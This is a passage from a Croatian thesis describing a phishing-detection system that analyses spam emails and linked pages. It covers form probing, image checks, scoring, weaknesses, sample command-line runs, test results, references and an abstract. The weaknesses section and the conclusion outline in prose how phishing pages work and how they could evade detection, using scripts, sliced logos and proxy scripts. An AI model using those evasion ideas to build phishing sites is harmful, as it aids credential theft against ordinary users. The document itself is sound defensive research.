Analiziraju se samo stranice u HTML obliku. Glavni elementi koji se traže na stranici su obrasci za unos podataka i poveznice. Obrazac za unos podataka je temeljni element phishing napada i on mora biti prisutan u nekom obliku. Bez obrasca nema napada. Međutim, obrazac se ne mora nalaziti na početnoj stranici i u teoriji ne mora biti izrađen u HTML-u. U drugom slučaju sustav neće pronaći obrazac i stranica će biti proglašena sigurnom. Prvi slučaj se rješava na način da se prate poveznice na stranici do zadane dubine i svaka nova stranica se analizira kao i početna. Ulazni HTML dokument se pretvara u XML stablo koje se zatim analizira te se izdvajaju sve poveznice, slike, obrasci i čisti tekst. Čisti tekst se pretražuje za ključne riječi vezane uz zaštićenu stranicu, ali rezultati pretrage nemaju bitnu ulogu u formiranju rezultata zbog jezičnih specifičnosti i nemogućnosti određivanja konteksta. Zbog različitih oblika riječi u raznim jezicima, ključnu riječ često nije moguće pronaći u izvornom obliku. Drugi razlog nepronalaska može biti skrivanje ključnih riječi u slikama. Sve pronađene poveznice se svrstavaju u dvije kategorije - one koje vode na štićenu stranicu i one koje ne vode. Samo postojanje poveznica u prvoj kategoriji povećava vjerojatnost da se radi o napadu. Poveznice iz druge kategorije su u praksi dosta rijetke. Napadačka stranica se sastoji samo od nekoliko HTML dokumenata koji su nužni. Sve poveznice koje se nalaze na stranici zato da bi imitirale izgled štićene stranice obično vode na samu štićenu stranicu. Sve pronađene slike se predaju modulu za analizu slika koji provjerava njihovo porijeklo te eventualno uspoređuje sadržaj sa slikama u bazi. Pronađeni obrasci se predaju modulu za analizu obrazaca.

Analiza HTML stabla stranice i usporedba sa štićenom stranicom nije dala upotrebljive rezultate. Iako dio napadača koristi dijelove HTML-a sa štićenih stranica, ti dijelovi su često promijenjeni da bi zadovoljili specifične potrebe napada i ne moraju biti preuzeti s najnovije

35

inačice štićene stranice, već mogu biti uzeti s neke od starijih inačica. Iz ovog razloga, a i zato jer je u HTML-u na mnogo načina moguće postići isti vizualni rezultat, HTML stabla se mogu drastično razlikovati i bilo kakva usporedba na toj razini ne daje rezultate.

6.4 Obrasci za unos podataka

Obrasci su središnji dio phishing napada. Sve ostalo postoji samo zato da bi žrtvu navelo da dođe do obrasca i ispuni ga potrebnim podacima. Program izdvaja sva polja na obrascu i provjerava podudaraju li se polja sa onima na izvornoj štićenoj stranici. Ukoliko se podudaraju, to povećava sumnju u napad, a nepodudaranje ne znači ništa. Jedna specifičnost obrazaca za unos podataka na phishing stranicama je to da se prihvaćaju bilo koji uneseni podaci. Napadač nema mogućnosti provjeriti ispravnost korisničkih imena i lozinki te se bilo koji unos prihvaća. Zbog toga će sustav pokušati otvoriti stranicu na koju obrazac vodi koristeći slučajne vrijednosti kao vrijednosti polja. Budući da je vjerojatnost pogotka stvarnih podataka na taj način praktički beznačajna, ako sumnjivi poslužitelj prihvati unesene podatke, radi se o stranici koja je predviđena za napad. Poslužitelj može nakon prihvaćanja podataka vratiti novu stranicu koja će opet biti analizirana ili preusmjeriti korisnika na stvarnu štićenu stranicu. Ako je korisnik preusmjeren na štićenu stranicu, onda se gotovo sigurno radi o napadu. Dobar dio phishing stranica ima samo jedan obrazac - onaj za unos korisničkog imena i lozinke, što je i dovoljno za većinu primjena poput društvenih mreža ili internetskih igara. Kod bankarskih prijevara se često pojavljuju veći obrasci gdje se traži velika količina osobnih podataka, od datuma i mjesta rođenja do imena i adrese roditelja. Svi obrasci na koje sustav naiđe će biti ispunjeni slučajnim brojevima i poslani. Na taj način se prolazi kroz cijelu strukturu napadačke stranice na isti način na koji bi prošla i potencijalna žrtva te se u tom prolazu skupljaju sve informacije koje mogu biti korisne za konačnu odluku.

6.5 Grafički elementi

Napadačka poruka i stranice moraju zadržavati vizualni identitet organizacije za koju se predstavljaju. Zato se koriste originalni logotipovi i boje na stranicama namijenjenim za prijevaru. Otkrivanje vizualne sličnosti grafičkih elemenata na dvije stranice je vrlo složen problem. Ovaj sustav će napraviti samo jednostavne provjere. Prije svega, provjerit će učitavaju li se grafički elementi sa štićene stranice. Ako je to točno, vrlo vjerojatno se radi o prijevari. Ako se grafički element ne učitava sa štićene stranice postoji mogućnost vrlo jednostavne vizualne provjere. Oba elementa, štićeni i sumnjivi, skaliraju se na jednake dimenzije uz izbacivanje praznog prostora te se provjerava postotak podudarnosti intenziteta boje na istim koordinatama. To je vrlo spor i nedjelotvoran postupak i zbog toga je ostavljen kao izborni.

6.6 Konačna ocjena

Sustav može u krajnjim slučajevima zaključiti da se sigurno radi ili ne radi o napadu, a ukoliko ne postoje dovoljni dokazi ni za jednu od te dvije tvrdnje, proglašava se niska, srednja ili visoka vjerojatnost napada. Ključni element odluke je obrazac za unos podataka. Ako je pronađen i ako u konačnici vodi na imitiranu (zaštićenu) stranicu, onda se sigurno radi o napadu. Ako ne vodi na imitiranu stranicu, a prihvaća bilo koji mogući unos i postoje drugi

36

dokazi, bilo u poruci, bilo na stranici, da se pokušava imitirati zaštićenu stranicu, onda se isto tako radi o napadu. Postoji mogućnost da stranica više nije aktivna, bilo da se ne odaziva ili da je postavljen sadržaj koji nema veze s napadom. U oba slučaja će razina rizika ovisiti o informacijama dostupnim u poruci. Ovaj sustav ne može prepoznati drugi slučaj te će on biti tretiran jednako kao i potencijalno opasna stranica.

Sustav ocjenjivanja se temelji na pravilu da dokaz potvrđuje sumnju, ali nedostatak dokaza ne oslobađa. Razlog tome je činjenica da privremena nedostupnost legitimne stranice generalno čini manju štetu nego uspješna izvedba napada.

6.7 Slabosti sustava

Najveći nedostatak sustava je podrška za isključivo statički HTML sadržaj. To ne predstavlja velik problem prilikom analize poruka budući da je većina čitača elektroničke pošte upravo zbog sigurnosti podešena tako da ne izvodi nikakve skripte koje se nalaze u porukama. Međutim, to ne vrijedi za stranice. Stranice često sadrže skripte. Odnosno, sama funkcionalnost stranice ovisi o skriptama. U trenutku izrade ovog programa veliku većinu phishing stranica čine jednostavni HTML dokumenti koji samo vizualno pokušavaju imitirati izgled stvarnih stranica. Kroz vrijeme, kako napadi postaju sve sofisticiraniji, počet će se sve intenzivnije koristiti i skripte u HTML dokumentima. JavaScript skripte su vrlo moćne unutar HTML dokumenata i mogu dinamički izgraditi praktički cijeli dokument tako da početni dokument koji se učita sadrži samo jednu poveznicu na skriptu. Takva stranica će biti obilježena kao sigurna od strane sustava za detekciju budući da ne sadrži ni jedan mogući kompromitirajući element - nema daljnih poveznica, nema obrazaca za unos podataka, nema čak ni logotipova koji bi se eventualno mogli provjeriti. Skripte koje se nalaze na stranici bi u ovakvom scenariju bilo nužno izvršiti i provesti analizu nad rezultatom. Ovdje se pojavljuje još nekoliko problema. Jedan od njih su skripte poput Adobe Flasha koje ne rezultiraju HTML-om. Rezultat izvođenja takvih skripti je izolirani vizualni element koji ima svu funkcionalnost kao i ostatak stranice, ali ponaša se kao samostalna aplikacija i na ovaj način nije moguće analizirati njegovu svrhu. Drugi mogući problem je detekcija organizacije na koju napad cilja. Bez te informacije nije moguće dokazati napad. Jedini sumnjivi element koji u tom slučaju ostaje je obrazac koji prima bilo koje vrijednosti za svoja potencijalno univerzalna polja poput korisničkog imena i lozinke. No takav obrazac se zbog potencijalne greške poslužitelja ili programera može pojaviti bilo gdje. Vizualno, moraju postojati elementi koji žrtvu uvjeravaju u namjenu stranice. No, ti elementi koji žrtvi daju dojam da se nalazi na legitimnoj stranici ne moraju nužno biti sadržani tamo gdje ih ovaj sustav traži, poput ključnih riječi u tekstu, ključnih riječi u opisima polja za unos podataka, sumnjivo konstruirane adrese, ili pak poveznica koje vode na originalnu stranicu. Izravne poveznice na izvornu stranicu ne moraju postojati. Ako se baš želi dobiti pristup toj izvornoj stranici, to je moguće postići pomoću tzv. proxy skripte na vlastitom poslužitelju koja onda dohvaća podatke s izvornog poslužitelja. Sva imena i logotipovi mogu biti prikazana pomoću slika. Spretniji napadač može izrezati te slike tako da ni napredni algoritmi ne mogu otkriti koji dio pripada kojem logotipu, a skripta na stranici će ih sastaviti tako da čine logičnu cjelinu. Iz svih ovih razloga statična analiza sadržaja stranice nije dovoljna, čak ni nakon izvršenja skripti. Jedina čvrsta točka dovoljno dobra za analizu identiteta stranice je konačni rezultat učitavanja stranice u prozoru preglednika. To znači da se tek nad konačnim rezultatom iscrtavanja sadržaja stranice mogu pokrenuti algoritmi za traženje sličnosti u slikama i na taj način pronaći eventualni logotipovi i imena. Ako se radi o HTML-u onda se obrasci i

37

poveznice mogu naći analizom izvornog koda, ali ako se radi o proizvoljnim nezavisnim skriptama koje se pokreću unutar preglednika, onda se ovaj pristup, pojačan mogućnošću interakcije s aplikacijom, mora upotrijebiti za dobivanje bilo kakvih informacija o stranici. Ovo je pristup koji izlazi iz granica ovog rada te njegovi detalji neće biti razmatrani.

6.8 Primjeri uporabe

Sustav se pokreće iz komandne linije, a kao parametar se može zadati putanja do datoteke koju je potrebno provjeriti ili do direktorija koji sadrži veći broj datoteka. Ukoliko se zadaje direktorij, sve datoteke koje nisu skrivene (odnosno ime ne počinje točkom) će biti analizirane. Očekuje se da svaka datoteka bude u RFC 5322 formatu. U suprotnom će analiza rezultirati greškom.

$ python ./main.py ~/test_data/assorted/paypal-spam-94 Poruka: paypal-spam-94 https://www.paypal.com: poznato http://localhost/~drago/paypal.com/verify.html: napad Stranica: http://www.paypalobjects.com/en_US/i/logo/verisign.gif: sumnjivo URL http://localhost/step2.php rezultat: sumnjivo FORM http://localhost/step2.php rezultat: sumnjivo URL http://localhost/~drago/paypal.com/verify.html rezultat: napad -Konacni rezultat: napad $

Slika 6.1: Analiza napadačke poruke

Na slici 6.1. možemo vidjeti tijek analize jedne sumnjive poruke. Poruka je namjerno izmijenjena tako da sve poveznice sadrže adrese koje se nalaze na lokalnom računalu. Razlog tome je kratak životni vijek napadačkih stranica. Stranica koja se koristi u ovom primjeru je u cijelosti kopija napadačke stranice. Jedina izmjena u poruci su adrese. Analiza kreće učitavanjem poruke i izdvajanjem adresa. Prvi trag da se radi o napadu je činjenica da se u poruci istovremeno nalaze adrese koje vode na štićenu stranicu i one koje ne vode. Dodatno, adresa koja ne vodi na štićenu stranicu, u sebi sadrži ime štićene stranice i to je vrlo pouzdan znak napada. Osim toga, stranica na koju vodi poveznica iz poruke sadrži obrasce za unos podataka te je konačna odluka da se radi o napadu. Na slici 6.2. je prikazana analiza poruke koja sadrži elemente koji bi mogli uzrokovati sumnju, ali nema dokaza o stvarnom napadu.

python ./main.py ~/test_data/assorted/spam-45 Poruka: spam-45 http://andhnxwgjrh.blogspot.com: - URL http://andhnxwgjrh.blogspot.com rezultat: sumnjivo -Konacni rezultat: sumnjivo $

Slika 6.2: Analiza sumnjive poruke

38

6.9 Testiranje sustava

Testiranje je provedeno pomoću 104 poruke elektroničke pošte od kojih je 8 poruka napadačkih za Banca di Roma, 8 za HSBC, 28 za PayPal, a ostalih 60 su obične poruke neželjene pošte. Zbog kratkog životnog vijeka napadačkih stranica, poruke su pomoću proxy poslužitelja uparene s lokalno pohranjenim stranicama. Na taj način su vrlo vjerno reproducirani stvarni uvjeti.

Opasnim porukama je proglašeno 7 Banca di Roma poruka, 5 HSBC poruka i 24 PayPal poruke. Sve ostale poruke su proglašene sumnjivima. To među napadačkim porukama daje 82% točno svrstanih i 18% svrstanih u sumnjive iako su u stvarnosti napadačke. Sve obične poruke su svrstane kao sumnjive. Ovo ukazuje na nekoliko nedostataka sustava. Najprije, svaki sumnjivi element podiže razinu sumnje i zbog toga je jako teško dobiti odgovor da je poruka sigurna. Drugi nedostatak, koji je i lakše ispraviti, je činjenica da sustav kao rezultat daje jedan od sljedeća tri odgovora: “sigurno”, “sumnjivo” i ”napad”. Na većini običnih poruka je bilo puno manje elemenata koji bi ukazivali na napad nego na napadačkim stranicama i zbog toga bi stupnjevanje odgovora “sumnjivo” dalo puno kvalitetniji rezultat.

39

7. Zaključak

Phishing napadi su tehnički vrlo jednostavni za izvesti. Sve što je potrebno učiniti je postaviti lažnu internetsku stranicu, sastaviti poruku koja će navesti žrtve da posjete stranicu i zakupiti prostor u sustavu za distribuciju neželjene pošte. Zbog toga njihov broj stalno raste. Za razliku od banaka koje ne ulažu u edukaciju svojih klijenata, velike softverske kompanije su otkrile poslovni potencijal u zaštiti korisnika svog softvera i zahvaljujući tome korisnici najpopularnijih Internet preglednika imaju temeljnu zaštitu. Ta se zaštita obično temelji na komercijalnim i zatvorenim sustavima.

U ovom radu je izrađen jedan jednostavan primjer sustava za zaštitu od phishing napada. Pokazalo se da se radi o vrlo složenom problemu i da su potrebni napredni algoritmi poput prepoznavanja sadržaja teksta i slika kako bi se napad mogao pouzdano potvrditi. Phishing poruke su vrlo rijetke među generalnom neželjenom poštom te je potrebno skupiti jako velike količine neželjene pošte da bi se mogla izdvojiti dovoljna količina adresa phishing stranica za pružanje usluge provjere adrese u pregledniku. Zbog toga pregledavanje neželjene pošte ima smisla samo u sustavima s jako velikom količinom poruka. U suprotnom se mogu kontrolirati pojedinačne poruke prije nego dođu do krajnjeg korisnika.

40

8. Literatura

[1] APWG mjesečni izvještaji, http://www.antiphishing.org/phishReportsArchive.html

[2] PhishTank mjesečni izvještaji, http://www.phishtank.com/stats.php [3] R. Anderson, Closing the Phishing Hole – Fraud, Risk and Nonbanks,

https://www.kansascityfed.org/Publicat/PSR/Proceedings/2007/pdf/Anderson.pdf [4] D. Birk, M. Dornseif, S. Gajek, F. Grobert, Phishing Phishers—Tracing Identity Thieves

and Money Launderer, http://groebert.org/felix/pub/papers/TR_BiGaGr06Phoneypot_2.pdf

[5] J. Milletary, Technical Trends in Phishing Attacks, http://www.cert.org/archive/pdf/Phishing_trends.pdf

[6] C. E. Drake, J. J. Oliver, E. J. Koontz, Anatomy of a Phishing Email, http://research.microsoft.com/users/joshuago/conference/papers-2004/114.pdf

[7] T. Holz, M. Steiner, F. Dahl, E. Biersack, F. Freiling, Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on StormWorm, http://www.usenix.org/event/leet08/tech/full_papers/holz/holz.pdf

[8] M. Jakobsson, The Human Factor in Phishing, http://www.informatics.indiana.edu/markus/papers/aci.pdf

[9] M. Wu, R. C. Miller, Why Anti-Phishing Security Toolbars Do Not Work, http://www.rsa.com/rsalabs/cryptobytes/CryptoBytes-Winter07.pdf

[10] S. Doshi, N. Provos, M. Chew, A Framework for Detection and Measurement of Phishing Attacks, http://www.cs.jhu.edu/~sdoshi/index_files/phish_measurement.pdf

[11] PhishTank Blog, http://www.phishtank.com/blog/2006/10/17/xml-data-file-of-online-valid-phishes-from-phishtank/

[12] Mozilla Firefox Phishing Protection Design Documentation, https://wiki.mozilla.org/Phishing_Protection:_Design_Documentation

[13] W3Schools Browser statistics, http://www.w3schools.com/browsers/browsers_stats.asp

[14] Y. Zhang, S. Egelman, L. Cranor, J. Hong, Phinding Phish: Evaluating Anti-Phishing Tools, http://lorrie.cranor.org/pubs/ndss-phish-tools-final.pdf

[15] Google Goofs On Firefox's Anti-Phishing List, http://tech.slashdot.org/article.pl?sid=08/09/21/1827209

[16] R. Dhamija, J. D. Tygar, M. Hearst, Why Phishing Works, http://people.seas.harvard.edu/~rachna/papers/why_phishing_works.pdf

41

Sažetak U sklopu ovog rada analizirano je kakve prijetnje postoje vezane uz krađu identiteta na Internetu, kako se ta krađa provodi i koji su ciljevi, te je izrađen sustav koji spriječava krađu. Sustav se temelji na skupljanju i analizi poruka neželjene pošte, te izdvajanju i dodatnoj analizi potencijalno opasnih poruka i ciljanih internetskih stranica.

Abstract In this thesis online identity theft is explored with its risk and vulnerabilities. Technical details and goals are exposed and a protection system is developed. Protection system is based on spam analysis, phishing message isolation from other unsolicited mail and further message and target Web page analysis.